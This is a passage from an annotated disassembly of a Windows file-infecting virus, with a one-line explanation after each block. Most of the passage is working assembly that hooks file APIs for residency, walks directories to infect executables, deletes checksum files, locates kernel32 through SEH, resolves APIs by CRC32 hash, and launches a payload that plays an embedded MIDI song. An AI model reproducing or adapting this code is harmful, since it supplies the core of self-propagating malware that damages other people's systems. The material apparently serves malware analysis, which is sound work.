eax, eax CODE:004015DE jz short @@NextTrack CODE:004015DE CODE:004015E0 lodsb CODE:004015E1 dec dword ptr [edi+ebx+18h] CODE:004015E5 mov ah, al CODE:004015E7 and ah, 80h CODE:004015EA mov [edi+ebx+24h], ah CODE:004015EE and al, 7Fh CODE:004015F0 mov [edi+ebx+20h], al

CODE:004015F4 test ah, ah CODE:004015F6 jnz short @@IsRest CODE:004015F6 CODE:004015F8 push ecx CODE:004015F9 mov ecx, 5 CODE:004015FE sub [edi+ebx+18h], ecx CODE:00401602 xor eax, eax CODE:00401602 CODE:00401604 CODE:00401604 @@PlayNoteLoop: CODE:00401604 push dword ptr [edi+ebx+14h] CODE:00401608 lodsb CODE:00401609 push eax CODE:0040160A push edx CODE:0040160B call SendData CODE:0040160B CODE:00401610 loop @@PlayNoteLoop CODE:00401610 CODE:00401612 pop ecx CODE:00401612 CODE:00401613 CODE:00401613 @@IsRest: CODE:00401613 mov [edi+ebx+1ch], esi CODE:00401613 CODE:00401617 CODE:00401617 @@NextTrack: CODE:00401617 CODE:00401617 add ebx, 18h CODE:0040161A dec ecx CODE:0040161B jnz @@UpdateLoop CODE:0040161B CODE:00401621 or dword ptr [edi+0ch], 0FFFFFFFFh CODE:00401625 push 50h CODE:00401627 mov al, 1 CODE:00401629 call StealthAPI CODE:00401629 CODE:0040162E cmp dword ptr [edi+8], 0 CODE:00401632 jnz @@PlaySong CODE:00401632 CODE:00401638 push dword ptr [edi] CODE:0040163A mov al, 24h CODE:0040163C call StealthAPI CODE:0040163C CODE:00401641 CODE:00401641 @@Error: CODE:00401641 add esp, 178h CODE:00401647 popa CODE:00401648 retn 4 CODE:00401648 CODE:00401648 PlayMidiSong endp The previous code block plays an embedded midi song hard coded in the virus as notes. CODE:0040164B SendData CODE:0040164B proc near

CODE:0040164B CODE:0040164B ARG1 = dword ptr 4 CODE:0040164B ARG2 = dword ptr 8 CODE:0040164B ARG3 = dword ptr 0Ch CODE:0040164B CODE:0040164B pusha CODE:0040164C mov eax, [esp+20h+arg3] CODE:00401650 shl eax, 10h CODE:00401653 mov ebx, [esp+20h+arg2] CODE:00401657 shl ebx, 8 CODE:0040165A add eax, ebx CODE:0040165C add eax, [esp+20h+arg1] CODE:00401660 push eax CODE:00401661 push dword ptr [edi] CODE:00401663 mov al, 28h CODE:00401665 call StealthAPI CODE:00401665 CODE:0040166A test eax, eax CODE:0040166C popa CODE:0040166D retn 0Ch CODE:0040166D CODE:0040166D SendData endp The previous code block is used to send data to the midi output device. CODE:00401670 HookAPIs proc near CODE:00401670 CODE:00401670 pusha CODE:00401671 push 0 CODE:00401673 mov al, 2 CODE:00401675 call StealthAPI CODE:00401675 CODE:0040167A xchg eax, ebx CODE:0040167B mov esi, [ebx+3ch] CODE:0040167E mov esi, [ebx+esi+80h] CODE:00401685 add esi, ebx CODE:00401685 CODE:00401687 CODE:00401687 @@FindLibrary: CODE:00401687 cmp dword ptr [esi], 0 CODE:0040168A jz short @@NoMoreHooks CODE:0040168A CODE:0040168C push esi CODE:0040168D mov esi, [esi+0ch] CODE:00401690 add esi, ebx CODE:00401692 push ebx CODE:00401693 call Uppercase CODE:00401693 CODE:00401698 call GetCRC32OfString CODE:00401698 CODE:0040169D cmp [esp+2ch], ebx CODE:004016A1 jz short @@FoundLibrary CODE:004016A1 CODE:004016A3 pop ebx CODE:004016A4 pop esi

CODE:004016A5 add esi, 14h CODE:004016A8 jmp short @@FindLibrary CODE:004016A8 CODE:004016AA ; ------------------------------------------------------------- -------------- CODE:004016AA CODE:004016AA @@FoundLibrary: CODE:004016AA pop ebx CODE:004016AB pop esi CODE:004016AC xor ecx, ecx CODE:004016AE mov edx, [esi+10h] CODE:004016B1 add edx, ebx CODE:004016B3 mov esi, [esi] CODE:004016B5 add esi, ebx CODE:004016B5 CODE:004016B7 CODE:004016B7 @@NextAPIHook: CODE:004016B7 lodsd CODE:004016B8 test eax, eax CODE:004016BA jz short @@NoMoreHooks CODE:004016BA CODE:004016BC push esi CODE:004016BD lea esi, [eax+ebx+2] CODE:004016C1 lea edi, API_Hook_Table CODE:004016C7 cmp al, 80h CODE:004016C9 jz short @@NotInThisStructure CODE:004016C9 CODE:004016CB CODE:004016CB @@SearchAPIHOOKStructure: CODE:004016CB cmp byte ptr [edi], 0 CODE:004016CE jz short @@NotInThisStructure CODE:004016CE CODE:004016D0 push esi CODE:004016D1 push ebx CODE:004016D2 call GetCRC32OfString CODE:004016D2 CODE:004016D7 cmp [edi], ebx CODE:004016D9 pop ebx CODE:004016DA jz short @@SetHook CODE:004016DA CODE:004016DC CODE:004016DC @@DoneSetHook: CODE:004016DC pop esi CODE:004016DD add edi, 0Ch CODE:004016E0 jmp short @@SearchAPIHOOKStructure CODE:004016E0 CODE:004016E2 ; ------------------------------------------------------------- -------------- CODE:004016E2 CODE:004016E2 @@SetHook: CODE:004016E2 lea esi, [edx+ecx*4] CODE:004016E5 mov eax, [esi] CODE:004016E7 mov [edi+8], eax CODE:004016EA lea eax, EntryPoint CODE:004016F0 add eax, [edi+4] CODE:004016F3 mov [esi], eax CODE:004016F5 jmp short @@DoneSetHook

CODE:004016F5 CODE:004016F7 ; ------------------------------------------------------------- -------------- CODE:004016F7 CODE:004016F7 @@NotInThisStructure: CODE:004016F7 CODE:004016F7 pop esi CODE:004016F8 inc ecx CODE:004016F9 jmp short @@NextAPIHook CODE:004016F9 CODE:004016FB ; ------------------------------------------------------------- -------------- CODE:004016FB CODE:004016FB @@NoMoreHooks: CODE:004016FB CODE:004016FB popa CODE:004016FC retn 4 CODE:004016FC CODE:004016FC HookAPIs endp The previous code block hooks several API s which is also known as per process residency. CODE:004016FF call GenericHookHandler CODE:004016FF CODE:00401704 jmp AH_CreateFileA CODE:00401704 CODE:0040170A CODE:0040170A call GenericHookHandler CODE:0040170A CODE:0040170F jmp AH_WinExec CODE:0040170F CODE:00401715 CODE:00401715 call GenericHookHandler CODE:00401715 CODE:0040171A jmp AH_OpenFile CODE:0040171A CODE:00401720 CODE:00401720 call GenericHookHandler CODE:00401720 CODE:00401725 jmp AH lopen CODE:00401725 CODE:0040172B CODE:0040172B call GenericHookHandler CODE:0040172B CODE:00401730 jmp AH_CreateProcessA CODE:00401730 CODE:00401736 CODE:00401736 call GenericHookHandler CODE:00401736 CODE:0040173B jmp AH_CopyFileA CODE:0040173B CODE:00401741 CODE:00401741 call GenericHookHandler CODE:00401741 CODE:00401746 jmp AH_MoveFileA

CODE:00401746 CODE:0040174C CODE:0040174C call GenericHookHandler CODE:0040174C CODE:00401751 jmp AH_MoveFileExA CODE:00401751 CODE:00401757 CODE:00401757 call GenericHookHandler CODE:00401757 CODE:0040175C jmp AH_FindFirstFileA CODE:0040175C CODE:00401762 CODE:00401762 call GenericHookHandler CODE:00401762 CODE:00401767 jmp AH_GetFullPathNameA CODE:00401767 CODE:0040176D CODE:0040176D call GenericHookHandler CODE:0040176D CODE:00401772 jmp AH_GetShortPathNameA CODE:00401772 CODE:00401778 CODE:00401778 call GenericHookHandler CODE:00401778 CODE:0040177D jmp AH_SetFileAttributesA CODE:0040177D CODE:00401783 CODE:00401783 call GenericHookHandler CODE:00401783 CODE:00401788 jmp AH_GetFileAttributesA CODE:00401788 CODE:0040178E CODE:0040178E call GenericHookHandler CODE:0040178E CODE:00401793 jmp AH_GetBinaryTypeA CODE:00401793 CODE:00401799 CODE:00401799 pushf CODE:0040179A pusha CODE:0040179B call Initialize CODE:0040179B CODE:004017A0 test eax, eax CODE:004017A2 jz short loc_4017cf CODE:004017A2 CODE:004017A4 or ThreadExecution, 0FFFFFFFFh CODE:004017AB push 0FFFFh CODE:004017B0 push ThreadHandle CODE:004017B6 mov al, 1Bh CODE:004017B8 call StealthAPI CODE:004017B8 CODE:004017BD push ThreadHandle CODE:004017C3 mov al, 5 CODE:004017C5 call StealthAPI CODE:004017C5 CODE:004017CA call UnInitialize CODE:004017CA CODE:004017CF

CODE:004017CF loc_4017cf: CODE:004017CF add esp, 1000h CODE:004017D5 popa CODE:004017D6 popf CODE:004017D7 jmp AH_ExitProcess CODE:004017D7 CODE:004017DD CODE:004017DD pushf CODE:004017DE pusha CODE:004017DF call Initialize CODE:004017DF CODE:004017E4 test eax, eax CODE:004017E6 jz short loc_40184a CODE:004017E6 CODE:004017E8 mov eax, 3 CODE:004017ED call RandomNumber CODE:004017ED CODE:004017F2 test eax, eax CODE:004017F4 jnz short loc_40184a CODE:004017F4 CODE:004017F6 push 0 CODE:004017F8 lea eax, PayloadThread CODE:004017FE push esp CODE:004017FF push 0 CODE:00401801 push 0 CODE:00401803 push eax CODE:00401804 push 0 CODE:00401806 push 0 CODE:00401808 mov al, 1Ah CODE:0040180A call StealthAPI CODE:0040180A CODE:0040180F pop ebx CODE:00401810 test eax, eax CODE:00401812 jz short loc_40184a CODE:00401812 CODE:00401814 push eax CODE:00401815 mov al, 5 CODE:00401817 call StealthAPI CODE:00401817 CODE:0040181C push 0 CODE:0040181E lea eax, szpayloadmessage CODE:00401824 push eax CODE:00401825 lea eax, szpayloadtitle CODE:0040182B push eax CODE:0040182C push dword ptr [esp+1034h] CODE:00401833 mov al, 29h CODE:00401835 call StealthAPI CODE:00401835 CODE:0040183A call UnInitialize CODE:0040183A CODE:0040183F add esp, 1000h CODE:00401845 popa CODE:00401846 popf CODE:00401847 retn 10h CODE:00401847 CODE:0040184A CODE:0040184A

CODE:0040184A loc_40184a: CODE:0040184A CODE:0040184A call UnInitialize CODE:0040184A CODE:0040184F add esp, 1000h CODE:00401855 popa CODE:00401856 popf CODE:00401857 jmp AH_ShellAboutA The previous code block was a series of handlers for the hooked API functions. CODE:0040185D GenericHookHandler proc near CODE:0040185D CODE:0040185D CODE:0040185D arg_ff8 = dword ptr 0FFCh CODE:0040185D arg_1004 = dword ptr 1008h CODE:0040185D CODE:0040185D pushf CODE:0040185E pusha CODE:0040185E CODE:0040185F CODE:0040185F @@GenericHookIsBusy: CODE:0040185F cmp GenericHookState, 0 CODE:00401866 jnz short @@GenericHookIsBusy CODE:00401866 CODE:00401868 or GenericHookState, 0FFFFFFFFh CODE:0040186F call Initialize CODE:0040186F CODE:00401874 test eax, eax CODE:00401876 jz short @@Return CODE:00401876 CODE:00401878 cmp Infect_Encrypted, 0 CODE:0040187F jz short @@Return CODE:0040187F CODE:00401881 mov esi, [esp+24h+arg_1004] CODE:00401888 lea edi, [ebp+13ch] CODE:0040188E push edi CODE:0040188F push esi CODE:00401890 mov al, 16h CODE:00401892 call StealthAPI CODE:00401892 CODE:00401897 inc eax CODE:00401898 jz short @@Return CODE:00401898 CODE:0040189A dec eax CODE:0040189B push eax CODE:0040189C mov al, 5 CODE:0040189E call StealthAPI CODE:0040189E CODE:004018A3 lea edi, [ebp+168h] CODE:004018A9 mov esi, [esp+30h+arg_ff8] CODE:004018A9 CODE:004018B0 CODE:004018B0 @@CopyFileName: CODE:004018B0 lodsb

CODE:004018B1 stosb CODE:004018B2 test al, al CODE:004018B4 jnz short @@CopyFileName CODE:004018B4 CODE:004018B6 call InfectFile CODE:004018B6 CODE:004018BB CODE:004018BB @@Return: CODE:004018BB CODE:004018BB add esp, 1000h CODE:004018C1 and GenericHookState, 0 CODE:004018C8 popa CODE:004018C9 popf CODE:004018CA retn CODE:004018CA CODE:004018CA GenericHookHandler endp The previous code block is a generic hook handler routine for hooked API. CODE:004018CB Uppercase proc near CODE:004018CB CODE:004018CB pusha CODE:004018CC mov edi, esi CODE:004018CC CODE:004018CE CODE:004018CE @@MakeUppercaseLoop: CODE:004018CE lodsb CODE:004018CF cmp al, 'a' CODE:004018D1 jb short @@NoUppercase CODE:004018D1 CODE:004018D3 cmp al, 'z' CODE:004018D5 ja short @@NoUppercase CODE:004018D5 CODE:004018D7 and al, 11011111b CODE:004018D7 CODE:004018D9 CODE:004018D9 @@NoUppercase: CODE:004018D9 CODE:004018D9 stosb CODE:004018DA test al, al CODE:004018DC jnz short @@MakeUppercaseLoop CODE:004018DC CODE:004018DE popa CODE:004018DF retn CODE:004018DF CODE:004018DF Uppercase endp The previous code block reformats a string to be all uppercase. CODE:004018E0 RandomNumber proc near CODE:004018E0 CODE:004018E0 CODE:004018E0 var_4 = dword ptr -4 CODE:004018E0

CODE:004018E0 pusha CODE:004018E1 push eax CODE:004018E1 CODE:004018E2 CODE:004018E2 @@RandomNumberIsBusy: CODE:004018E2 cmp RandomNumberState, 0 CODE:004018E9 jnz short @@RandomNumberIsBusy CODE:004018E9 CODE:004018EB or RandomNumberState, 0FFFFFFFFh CODE:004018F2 call genrand_int32 CODE:004018F2 CODE:004018F7 pop ecx CODE:004018F8 xor edx, edx CODE:004018FA div ecx CODE:004018FC mov [esp+20h+var_4], edx CODE:00401900 and RandomNumberState, 0 CODE:00401907 popa CODE:00401908 retn CODE:00401908 CODE:00401908 RandomNumber endp The previous code block returns a random range within a range. CODE:00401909 GetAPIsFromCRC32List proc near CODE:00401909 CODE:00401909 CODE:00401909 var_28 = dword ptr -28h CODE:00401909 var_24 = dword ptr -24h CODE:00401909 PA_EAX = dword ptr -4 CODE:00401909 ARG1 = dword ptr 4 CODE:00401909 ARG2 = dword ptr 8 CODE:00401909 ARG3 = dword ptr 0Ch CODE:00401909 ARG4 = dword ptr 10h CODE:00401909 CODE:00401909 pusha CODE:0040190A or dword ptr [ebp+14h], 0FFFFFFFFh CODE:0040190E mov ebx, [esp+20h+arg4] CODE:00401912 mov esi, [ebx+3ch] CODE:00401915 add esi, ebx CODE:00401917 mov esi, [esi+78h] CODE:0040191A lea esi, [ebx+esi+18h] CODE:0040191E lodsd CODE:0040191F xchg eax, ecx CODE:00401920 inc ecx CODE:00401921 lodsd CODE:00401922 add eax, ebx CODE:00401924 push eax CODE:00401925 lodsd CODE:00401926 lea edi, [ebx+eax] CODE:00401929 mov edi, [edi] CODE:0040192B add edi, ebx CODE:0040192D lodsd CODE:0040192E add eax, ebx CODE:00401930 push eax CODE:00401930

CODE:00401931 CODE:00401931 @@ProcessNextAPIName: CODE:00401931 CODE:00401931 dec ecx CODE:00401932 jecxz short @@VerifyAPITable CODE:00401932 CODE:00401934 xchg esi, edi CODE:00401936 inc dword ptr [ebp+14h] CODE:00401939 call GetCRC32OfString CODE:00401939 CODE:0040193E mov edi, esi CODE:00401940 mov esi, [esp+28h+arg1] CODE:00401944 or edx, 0FFFFFFFFh CODE:00401944 CODE:00401947 CODE:00401947 @@CompareNextCRC32InTable: CODE:00401947 inc edx CODE:00401948 lodsd CODE:00401949 test eax, eax CODE:0040194B jz short @@ProcessNextAPIName CODE:0040194B CODE:0040194D cmp eax, ebx CODE:0040194F jnz short @@CompareNextCRC32InTable CODE:0040194F CODE:00401951 mov esi, [esp+28h+var_28] CODE:00401954 mov ebx, [ebp+14h] CODE:00401957 movzx ebx, word ptr [esi+ebx*2] CODE:0040195B mov esi, [esp+28h+var_24] CODE:0040195F mov ebx, [esi+ebx*4] CODE:00401962 add ebx, [esp+28h+arg4] CODE:00401966 mov eax, [esp+28h+arg2] CODE:0040196A lea eax, [eax+edx*4] CODE:0040196D mov [eax], ebx CODE:0040196F jmp short @@ProcessNextAPIName CODE:0040196F CODE:00401971 CODE:00401971 CODE:00401971 @@VerifyAPITable: CODE:00401971 mov esi, [esp+28h+arg2] CODE:00401975 mov ecx, [esp+28h+arg3] CODE:00401975 CODE:00401979 CODE:00401979 @@VerifyAPIEntry: CODE:00401979 lodsd CODE:0040197A test eax, eax CODE:0040197C jz short @@UnresolvedAPIEntry CODE:0040197C CODE:0040197E loop @@VerifyAPIEntry CODE:0040197E CODE:00401980 CODE:00401980 @@UnresolvedAPIEntry: CODE:00401980 add esp, 8 CODE:00401983 mov [esp+20h+pa_eax], eax CODE:00401987 popa CODE:00401988 retn 10h CODE:00401988 CODE:00401988 GetAPIsFromCRC32List endp

The previous code block retrieves pointers to several API s. The function will take require the pointer to the CRC32 list, pointer to a buffer where the API addresses will be saved, the number of imported API s and the Base Address. CODE:0040198B GetCRC32OfString proc near CODE:0040198B CODE:0040198B push eax CODE:0040198C push ecx CODE:0040198D push edx CODE:0040198E push edi CODE:0040198F cld CODE:00401990 xor ecx, ecx CODE:00401992 dec ecx CODE:00401993 mov edx, ecx CODE:00401993 CODE:00401995 CODE:00401995 @@NextByteCRC: CODE:00401995 cmp byte ptr [esi], 0 CODE:00401998 jz short @@Done CODE:00401998 CODE:0040199A xor eax, eax CODE:0040199C xor ebx, ebx CODE:0040199E lodsb CODE:0040199F xor al, cl CODE:004019A1 mov cl, ch CODE:004019A3 mov ch, dl CODE:004019A5 mov dl, dh CODE:004019A7 mov dh, 8 CODE:004019A7 CODE:004019A9 CODE:004019A9 @@NextBitCRC: CODE:004019A9 shr bx, 1 CODE:004019AC rcr ax, 1 CODE:004019AF jnb short @@NoCRC CODE:004019AF CODE:004019B1 xor ax, 8320h CODE:004019B5 xor bx, 0EDB8h CODE:004019B5 CODE:004019BA CODE:004019BA @@NoCRC: CODE:004019BA dec dh CODE:004019BC jnz short @@NextBitCRC CODE:004019BC CODE:004019BE xor ecx, eax CODE:004019C0 xor edx, ebx CODE:004019C2 dec edi CODE:004019C3 jnz short @@NextByteCRC CODE:004019C3 CODE:004019C5 CODE:004019C5 @@Done: CODE:004019C5 not edx CODE:004019C7 not ecx CODE:004019C9 mov eax, edx

CODE:004019CB rol eax, 10h CODE:004019CE mov ax, cx CODE:004019D1 inc esi CODE:004019D2 xchg eax, ebx CODE:004019D3 pop edi CODE:004019D4 pop edx CODE:004019D5 pop ecx CODE:004019D6 pop eax CODE:004019D7 retn CODE:004019D7 CODE:004019D7 GetCRC32OfString endp The previous code block calculates the CRC32 of zero terminated string. The function expects a pointer to the ASCII string in ESI register. CODE:004019D8 GetKernel32Base proc near CODE:004019D8 push eax CODE:004019D9 push esi CODE:004019DA xor esi, esi CODE:004019DC mov esi, fs:[esi] CODE:004019DC CODE:004019DF CODE:004019DF @@GetNextSEHandler: CODE:004019DF mov eax, [esi] CODE:004019E1 inc eax CODE:004019E2 jz short @@NoMoreSEHandlersLeft CODE:004019E2 CODE:004019E4 dec eax CODE:004019E5 xchg eax, esi CODE:004019E6 jmp short @@GetNextSEHandler CODE:004019E6 CODE:004019E8 CODE:004019E8 CODE:004019E8 @@NoMoreSEHandlersLeft: CODE:004019E8 mov eax, [esi+4] CODE:004019EB xor ax, ax CODE:004019EB CODE:004019EE CODE:004019EE @@GetMZHeader: CODE:004019EE cmp word ptr [eax], 5A4Dh CODE:004019F3 jz short @@IsMZHeader CODE:004019F3 CODE:004019F5 CODE:004019F5 @@Sub10hPages: CODE:004019F5 sub eax, 10000h CODE:004019FA jmp short @@GetMZHeader CODE:004019FA CODE:004019FC CODE:004019FC CODE:004019FC @@IsMZHeader: CODE:004019FC mov [ebp+0], eax CODE:004019FF mov esi, [eax+3ch] CODE:00401A02 add esi, eax CODE:00401A04 cmp dword ptr [esi], 4550h CODE:00401A0A jnz short @@Sub10hPages

CODE:00401A0A CODE:00401A0C pop esi CODE:00401A0D pop eax CODE:00401A0E retn CODE:00401A0E CODE:00401A0E GetKernel32Base endp The previous code retrieves the Kernel32 location in memory. The function retrieves the Kernel32 location using SEH. CODE:00401A0F DirectoryTraversal proc near CODE:00401A0F CODE:00401A0F var_17c = dword ptr -17Ch CODE:00401A0F var_170 = dword ptr -170h CODE:00401A0F var_144 = dword ptr -144h CODE:00401A0F var_40 = dword ptr -40h CODE:00401A0F CODE:00401A0F pusha CODE:00401A10 push 0 CODE:00401A12 lea eax, DIR_Root+2 CODE:00401A18 push eax CODE:00401A19 mov al, 0Ch CODE:00401A1B call StealthAPI CODE:00401A1B CODE:00401A20 test eax, eax CODE:00401A22 jz @@CantSetDirectory CODE:00401A22 CODE:00401A28 CODE:00401A28 @@NewDirectory: CODE:00401A28 sub esp, 140h CODE:00401A2E push esp CODE:00401A2F lea eax, DIR_Wildcards CODE:00401A35 push eax CODE:00401A36 mov al, 16h CODE:00401A38 call StealthAPI CODE:00401A38 CODE:00401A3D push eax CODE:00401A3E inc eax CODE:00401A3F jz @@GoToParentDirectory CODE:00401A3F CODE:00401A45 dec eax CODE:00401A45 CODE:00401A46 CODE:00401A46 @@ExamineFile: CODE:00401A46 lea ebx, [esp+174h+var_144] CODE:00401A4A test byte ptr [esp+174h+var_170], 10h CODE:00401A4F jz short @@PassFileForInfection CODE:00401A4F CODE:00401A51 cmp byte ptr [ebx], '.' CODE:00401A54 jz short @@FindNextFile CODE:00401A54 CODE:00401A56 push ebx CODE:00401A57 mov al, 0Ch CODE:00401A59 call StealthAPI CODE:00401A59

CODE:00401A5E jmp short @@NewDirectory CODE:00401A5E CODE:00401A60 ; ------------------------------------------------------------- -------------- CODE:00401A60 CODE:00401A60 @@PassFileForInfection: CODE:00401A60 lea esi, [esp+174h+var_170] CODE:00401A64 lea edi, [ebp+13ch] CODE:00401A6A mov ecx, 140h CODE:00401A6F rep movsb CODE:00401A71 push eax CODE:00401A72 lea esi, [ebp+168h] CODE:00401A78 call Uppercase CODE:00401A78 CODE:00401A7D call GetCRC32OfString CODE:00401A7D CODE:00401A82 lea esi, CRC32_Checksumfile_List CODE:00401A82 CODE:00401A88 CODE:00401A88 @@CheckForChecksumList: CODE:00401A88 lodsd CODE:00401A89 xchg eax, ecx CODE:00401A8A jecxz short @@NotAChecksumFile CODE:00401A8A CODE:00401A8C cmp ebx, ecx CODE:00401A8E jnz short @@CheckForChecksumList CODE:00401A8E CODE:00401A90 lea esi, [ebp+168h] CODE:00401A96 push esi CODE:00401A97 push 80h CODE:00401A9C push esi CODE:00401A9D mov al, 11h CODE:00401A9F call StealthAPI CODE:00401A9F CODE:00401AA4 mov al, 15h CODE:00401AA6 call StealthAPI CODE:00401AA6 CODE:00401AAB pop eax CODE:00401AAC jmp short @@FindNextFile CODE:00401AAC CODE:00401AAE CODE:00401AAE CODE:00401AAE @@NotAChecksumFile: CODE:00401AAE pop eax CODE:00401AAF or dword ptr [ebp+280h], 0FFFFFFFFh CODE:00401AB6 call InfectFile CODE:00401AB6 CODE:00401ABB inc dword ptr [ebp+280h] CODE:00401AC1 jz short @@FindNextFile CODE:00401AC1 CODE:00401AC3 dec dword ptr [ebp+27ch] CODE:00401AC9 jz short @@CloseHandles CODE:00401AC9 CODE:00401ACB CODE:00401ACB @@FindNextFile: CODE:00401ACB CODE:00401ACB lea ebx, [esp+174h+var_170]

CODE:00401ACF push ebx CODE:00401AD0 push eax CODE:00401AD1 mov al, 17h CODE:00401AD3 call StealthAPI CODE:00401AD3 CODE:00401AD8 cmp ThreadExecution, 0FFFFFFFFh CODE:00401ADF jz short @@CloseHandles CODE:00401ADF CODE:00401AE1 test eax, eax CODE:00401AE3 mov eax, [esp+17ch+var_17c] CODE:00401AE6 jnz @@ExamineFile CODE:00401AE6 CODE:00401AEC CODE:00401AEC @@GoToParentDirectory: CODE:00401AEC push eax CODE:00401AED mov al, 18h CODE:00401AEF call StealthAPI CODE:00401AEF CODE:00401AF4 lea eax, DIR_Parent CODE:00401AFA push eax CODE:00401AFB mov al, 0Ch CODE:00401AFD call StealthAPI CODE:00401AFD CODE:00401B02 add esp, 144h CODE:00401B08 mov eax, [esp+40h+var_40] CODE:00401B0B test eax, eax CODE:00401B0D jnz short @@FindNextFile CODE:00401B0D CODE:00401B0F CODE:00401B0F @@CantSetDirectory: CODE:00401B0F CODE:00401B0F add esp, 4 CODE:00401B12 popa CODE:00401B13 retn CODE:00401B13 CODE:00401B14 CODE:00401B14 CODE:00401B14 @@CloseHandles: CODE:00401B14 CODE:00401B14 mov esi, esp CODE:00401B16 lodsd CODE:00401B17 test eax, eax CODE:00401B19 jz short @@CantSetDirectory CODE:00401B19 CODE:00401B1B mov al, 18h CODE:00401B1D call StealthAPI CODE:00401B1D CODE:00401B22 add esp, 140h CODE:00401B28 jmp short @@CloseHandles CODE:00401B28 CODE:00401B28 DirectoryTraversal endp The previous code block traverses the directories looking for files to infect. CODE:00401B2A init_genrand proc near

CODE:00401B2A CODE:00401B2A ARG1 = dword ptr 4 CODE:00401B2A CODE:00401B2A pusha CODE:00401B2B lea edi, [ebp+304h] CODE:00401B31 xor ecx, ecx CODE:00401B33 mov eax, [esp+20h+arg1] CODE:00401B37 stosd CODE:00401B37 CODE:00401B38 CODE:00401B38 @@init_genrand_loop: CODE:00401B38 inc ecx CODE:00401B39 cmp ecx, 270h CODE:00401B3F jz short @@Return CODE:00401B3F CODE:00401B41 mov edx, eax CODE:00401B43 shr edx, 1Eh CODE:00401B46 xor eax, edx CODE:00401B48 imul eax, 6C078965h CODE:00401B4E add eax, ecx CODE:00401B50 stosd CODE:00401B51 jmp short @@init_genrand_loop CODE:00401B51 CODE:00401B53 CODE:00401B53 CODE:00401B53 @@Return: CODE:00401B53 mov [ebp+300h], ecx CODE:00401B59 popa CODE:00401B5A retn 4 CODE:00401B5A CODE:00401B5A init_genrand endp The previous code block initializes an array with a 32 bit seed. CODE:00401B5D init_by_array proc near CODE:00401B5D CODE:00401B5D var_24 = dword ptr -24h CODE:00401B5D arg_0 = dword ptr 4 CODE:00401B5D arg_4 = dword ptr 8 CODE:00401B5D CODE:00401B5D pusha CODE:00401B5E lea edi, [ebp+304h] CODE:00401B64 mov esi, [esp+20h+arg_0] CODE:00401B68 xor edx, edx CODE:00401B6A push edx CODE:00401B6B inc edx CODE:00401B6C mov eax, [esp+24h+arg_4] CODE:00401B70 mov ecx, 270h CODE:00401B75 cmp eax, ecx CODE:00401B77 jl short @@_jump1 CODE:00401B77 CODE:00401B79 mov ecx, eax CODE:00401B79 CODE:00401B7B CODE:00401B7B @@_jump1:

CODE:00401B7B push 12BD6AAh CODE:00401B80 call init_genrand CODE:00401B80 CODE:00401B85 CODE:00401B85 @@_loop1: CODE:00401B85 mov eax, [edi+edx*4-4] CODE:00401B89 mov ebx, eax CODE:00401B8B shr eax, 1Eh CODE:00401B8E xor eax, ebx CODE:00401B90 imul eax, 19660Dh CODE:00401B96 xor eax, [edi+edx*4] CODE:00401B99 mov ebx, [esp+24h+var_24] CODE:00401B9C add eax, ebx CODE:00401B9E add eax, [esi+ebx*4] CODE:00401BA1 mov [edi+edx*4], eax CODE:00401BA4 inc edx CODE:00401BA5 inc [esp+24h+var_24] CODE:00401BA8 cmp edx, 270h CODE:00401BAE jl short @@_jump2 CODE:00401BAE CODE:00401BB0 mov eax, [edi+edx*4-4] CODE:00401BB4 mov [edi], eax CODE:00401BB6 xor edx, edx CODE:00401BB8 inc edx CODE:00401BB8 CODE:00401BB9 CODE:00401BB9 @@_jump2: CODE:00401BB9 mov ebx, [esp+24h+var_24] CODE:00401BBC cmp ebx, [esp+24h+arg_4] CODE:00401BC0 jl short @@_jump3 CODE:00401BC0 CODE:00401BC2 and [esp+24h+var_24], 0 CODE:00401BC2 CODE:00401BC6 CODE:00401BC6 @@_jump3: CODE:00401BC6 loop @@_loop1 CODE:00401BC6 CODE:00401BC8 mov ecx, 26Fh CODE:00401BC8 CODE:00401BCD CODE:00401BCD @@_loop2: CODE:00401BCD mov eax, [edi+edx*4-4] CODE:00401BD1 mov ebx, eax CODE:00401BD3 shr eax, 1Eh CODE:00401BD6 xor eax, ebx CODE:00401BD8 imul eax, 5D588B65h CODE:00401BDE xor eax, [edi+edx*4] CODE:00401BE1 sub eax, edx CODE:00401BE3 mov [edi+edx*4], eax CODE:00401BE6 inc edx CODE:00401BE7 mov eax, 270h CODE:00401BEC cmp edx, eax CODE:00401BEE jl short @@_jump4 CODE:00401BEE CODE:00401BF0 mov eax, [edi+eax*4-4] CODE:00401BF4 mov [edi], eax CODE:00401BF6 xor edx, edx

CODE:00401BF8 inc edx CODE:00401BF8 CODE:00401BF9 CODE:00401BF9 @@_jump4: CODE:00401BF9 loop @@_loop2 CODE:00401BF9 CODE:00401BFB mov dword ptr [edi], 80000000h CODE:00401C01 pop eax CODE:00401C02 popa CODE:00401C03 retn 8 CODE:00401C03 CODE:00401C03 init_by_array endp The previous code block initializes an array with an array of 32 bit seeds. CODE:00401C06 genrand_int32 proc near CODE:00401C06 CODE:00401C06 lea edi, [ebp+304h] CODE:00401C0C lea esi, mag01 CODE:00401C12 mov edx, [ebp+300h] CODE:00401C18 cmp edx, 270h CODE:00401C1E jl short @@_jump1 CODE:00401C1E CODE:00401C20 xor ecx, ecx CODE:00401C20 CODE:00401C22 CODE:00401C22 @@_loop2: CODE:00401C22 cmp ecx, 0E3h CODE:00401C28 jz short @@_jump3 CODE:00401C28 CODE:00401C2A call proc00401cb4 CODE:00401C2A CODE:00401C2F xor eax, [edi+ecx*4+634h] CODE:00401C36 mov [edi+ecx*4], eax CODE:00401C39 inc ecx CODE:00401C3A jmp short @@_loop2 CODE:00401C3A CODE:00401C3C CODE:00401C3C CODE:00401C3C @@_jump3: CODE:00401C3C CODE:00401C3C cmp ecx, 26Fh CODE:00401C42 jz short @@_jump4 CODE:00401C42 CODE:00401C44 call proc00401cb4 CODE:00401C44 CODE:00401C49 xor eax, [edi+ecx*4-38ch] CODE:00401C50 mov [edi+ecx*4], eax CODE:00401C53 inc ecx CODE:00401C54 jmp short @@_jump3 CODE:00401C54 CODE:00401C56 CODE:00401C56 CODE:00401C56 @@_jump4: CODE:00401C56 mov eax, [edi]

